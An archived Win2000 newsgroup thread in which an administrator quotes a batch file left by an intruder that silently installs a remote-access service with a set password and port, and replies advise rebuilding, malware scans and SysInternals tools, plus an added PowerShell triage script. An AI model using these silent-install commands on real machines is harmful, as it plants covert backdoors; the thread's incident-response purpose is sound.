Anyone know how to remove and verify these hacking tools a..

Archived from groups: microsoft.public.win2000,microsoft.public.win2000.group_policy,microsoft.public.win2000.security

Hi,

We had a directory under c:\winnt\system32\ named OS2. It had a bunch of
files like:
ndde.exe, nbthlp.exe, lssvc.exe, list.exe.

It looks like there was also a batch file with these commands in it:

regedit /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:Hack3d /port:5100 /save /silence
nvsvc.exe /start /silence
net start r_server

How can I check for installed services that are supposed to be running
silently? I'm concerned there are still backdoors on this server.

Thanks.

-- Kent Iler
----------------------------------------------------------------------
kent@iler.NOSPAM.com
Please CC: all replies via e-mail
Remove .NOSPAM from e-mail address
  1.

    The only real way is to reinstall the operating system from scratch and
    harden it and your network to prevent the same from happening again. But
    there are some things you can try. First of course is to run an antivirus
    program with the latest definitions and also run a parasite detection and
    removal program such as AdAware SE. Trend Micro has a great stand-alone
    utility that also scans for and removes many common malware. Just download
    Sysclean and the pattern file into a folder to run from. Note that it is
    not unusual for an antivirus program to report nothing found when a second
    opinion will find a problem. Pest Patrol is also very good at finding a LOT
    of stuff on a computer such as trojans and keyboard loggers.

    http://www.trendmicro.com/download/dcs.asp -- Sysclean malware detection
    and removal.
    http://www.trendmicro.com/download/pattern.asp -- this is updated often
    http://www.microsoft.com/technet/security/chklist/w2ksvrcl.mspx -- good
    tips from Microsoft on how to harden your computer.
    http://www.pestpatrol.com/ -- Pest Patrol [now owned by Computer
    Associates]

    SysInternals provides some great free tools to help analyze your computer to
    see if rogue processes are running. In particular download TCPView, Process
    Explorer, Autoruns, and PsList. TCPView will show what ports your computer is
    using and the associated process/executable, Process Explorer will give much
    more detailed info about processes and if you view a process's properties it
    will show the associated services and tcp/ip usage, Autoruns will show
    startup programs in various places on the computer and let you disable them,
    and PsList is a command line process viewer which you should use to view
    running processes locally and when shown from a remote computer to compare
    the results. A hidden service or rootkit infection may not show when
    processes are enumerated locally but they will when shown from another
    computer on the network, which you can do with PsList. If you do find a
    hidden process that cannot be removed by normal means you might try scanning
    the computer from another computer on the network or even one of the free
    online services. --- Steve

    http://www.sysinternals.com/ntw2k/freeware/pslist.shtml -- PsList
    http://www.sysinternals.com/ntw2k/source/tcpview.shtml -- TCPView and
    SysInternals website.

    "Kent P. Iler" <kent@iler.NOSPAM.com> wrote in message
    news:ljBed.415094$mD.112414@attbi_s02...
    > Hi,
    >
    > We had a directory under c:\winnt\system32\ named OS2. It had a bunch of
    > files like:
    > ndde.exe, nbthlp.exe, lssvc.exe, list.exe.
    >
    > It looks like there was also a batch file with these commands in it:
    >
    > regedit /s radmin.reg
    > nvsvc.exe /install /silence
    > nvsvc.exe /pass:Hack3d /port:5100 /save /silence
    > nvsvc.exe /start /silence
    > net start r_server
    >
    > How can I check for installed services that are supposed to be running
    > silently? I'm concerned there are still backdoors on this server.
    >
    > Thanks.
    >
    > -- Kent Iler
    > ----------------------------------------------------------------------
    > kent@iler.NOSPAM.com
    > Please CC: all replies via e-mail
    > Remove .NOSPAM from e-mail address
    >
    >
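    The original question (how to find services that were installed to run
    silently) and Steve's reply (map listening ports to processes, then compare a
    local process listing against one taken over the network) can both be worked
    through in one script. The following is an added example written for this
    thread, not code from either poster; it assumes a modern Windows host with
    PowerShell 5.1 or later, an administrative session, and that the service
    name (`r_server`), port (`5100`) and folder (`system32\OS2`) taken from the
    batch file in the post are the indicators you want flagged. The computer
    name `admin-ws` is a hypothetical second machine on the same network.

```powershell
# Added example (not from the thread): triage a Windows host for silently
# installed services and listeners along the lines the replies suggest.
# Assumes: administrator session, PowerShell 5.1+, modern Windows.
# Indicators below are the ones quoted in the original post.

$SuspectServiceNames = @('r_server')                     # "net start r_server"
$SuspectPorts        = @(5100)                           # "/port:5100"
$SuspectDirs         = @("$env:SystemRoot\system32\OS2") # dropped tool folder
$TrustedDirs         = @($env:SystemRoot, $env:ProgramFiles,
                         ${env:ProgramFiles(x86)}) | Where-Object { $_ }

# 1. Every installed service with its image path, start mode, account and
#    Authenticode status. A service is flagged when its name, folder, missing
#    or invalid signature, or out-of-tree image path matches an indicator.
$services = Get-CimInstance Win32_Service | ForEach-Object {
    # PathName may be quoted and may carry arguments; keep the image only.
    $img = if ($_.PathName -match '^"([^"]+)"') { $matches[1] }
           else { ($_.PathName -split ' ')[0] }
    $sig = if (Test-Path -LiteralPath $img) {
               (Get-AuthenticodeSignature -LiteralPath $img).Status
           } else { 'Missing' }
    $inTrusted = $TrustedDirs | Where-Object { $img -like "$_\*" }
    $inSuspect = $SuspectDirs | Where-Object { $img -like "$_\*" }
    [pscustomobject]@{
        Name       = $_.Name
        State      = $_.State
        StartMode  = $_.StartMode
        Account    = $_.StartName
        Image      = $img
        Signature  = $sig
        Suspicious = ($SuspectServiceNames -contains $_.Name) -or
                     [bool]$inSuspect -or
                     ($sig -ne 'Valid') -or
                     -not [bool]$inTrusted
    }
}
"== Services worth a closer look =="
$services | Where-Object Suspicious |
    Sort-Object Name | Format-Table Name, State, StartMode, Account, Image, Signature -AutoSize

# 2. Listening TCP ports mapped to the owning process image (what TCPView shows).
"== Listening TCP ports =="
Get-NetTCPConnection -State Listen | ForEach-Object {
    $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Port    = $_.LocalPort
        Pid     = $_.OwningProcess
        Process = $p.ProcessName
        Image   = $p.Path
        Flagged = $SuspectPorts -contains $_.LocalPort
    }
} | Sort-Object Port | Format-Table -AutoSize

# 3. The PsList comparison from reply 1: enumerate processes by two different
#    paths and diff them. Get-Process uses the local process APIs; Win32_Process
#    goes through WMI, and the same CIM query can be issued from another machine
#    (-ComputerName) so a process hidden from one path may still appear in the
#    other. Any PID present on one side only deserves a manual look.
$SuspectHost = $env:COMPUTERNAME      # run this block from 'admin-ws' and set
                                      # $SuspectHost to the server name instead
$viaApi = Get-Process | Select-Object -ExpandProperty Id
$viaWmi = Get-CimInstance Win32_Process -ComputerName $SuspectHost |
          Select-Object -ExpandProperty ProcessId
"== PIDs seen by only one enumeration path =="
Compare-Object -ReferenceObject $viaApi -DifferenceObject $viaWmi |
    ForEach-Object {
        $side = if ($_.SideIndicator -eq '<=') { 'API only' } else { 'WMI only' }
        [pscustomobject]@{ Pid = $_.InputObject; SeenBy = $side }
    } | Format-Table -AutoSize
```

    Run it once on the suspect server and once from a clean workstation with
    `$SuspectHost` set to the server's name; a process that appears in the
    remote listing but not the local one is the case Steve describes. Treat
    any hit as a reason to image the box and rebuild, which is what both
    replies recommend anyway.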
  2.

    I agree with Steven. If your server has been compromised, reinstall it from
    scratch.

    More info would be needed in order to figure out how this happened. Your
    network needs a good firewall that blocks inbound traffic you don't want
    coming in. Did you have FTP access open inbound? Do you have good antivirus
    software? Auditing enabled? All servers & workstations patched with the
    latest patches/hotfixes? Do you allow anyone to come in & plug in their own
    laptop on your network? Etc etc etc.


    Kent P. Iler wrote:
    > Hi,
    >
    > We had a directory under c:\winnt\system32\ named OS2. It had a bunch
    > of files like:
    > ndde.exe, nbthlp.exe, lssvc.exe, list.exe.
    >
    > It looks like there was also a batch file with these commands in
    > it:
    >
    > regedit /s radmin.reg
    > nvsvc.exe /install /silence
    > nvsvc.exe /pass:Hack3d /port:5100 /save /silence
    > nvsvc.exe /start /silence
    > net start r_server
    >
    > How can I check for installed services that are supposed to be running
    > silently? I'm concerned there are still backdoors on this server.
    >
    > Thanks.
    >
    > -- Kent Iler
    > ----------------------------------------------------------------------
    > kent@iler.NOSPAM.com
    > Please CC: all replies via e-mail
    > Remove .NOSPAM from e-mail address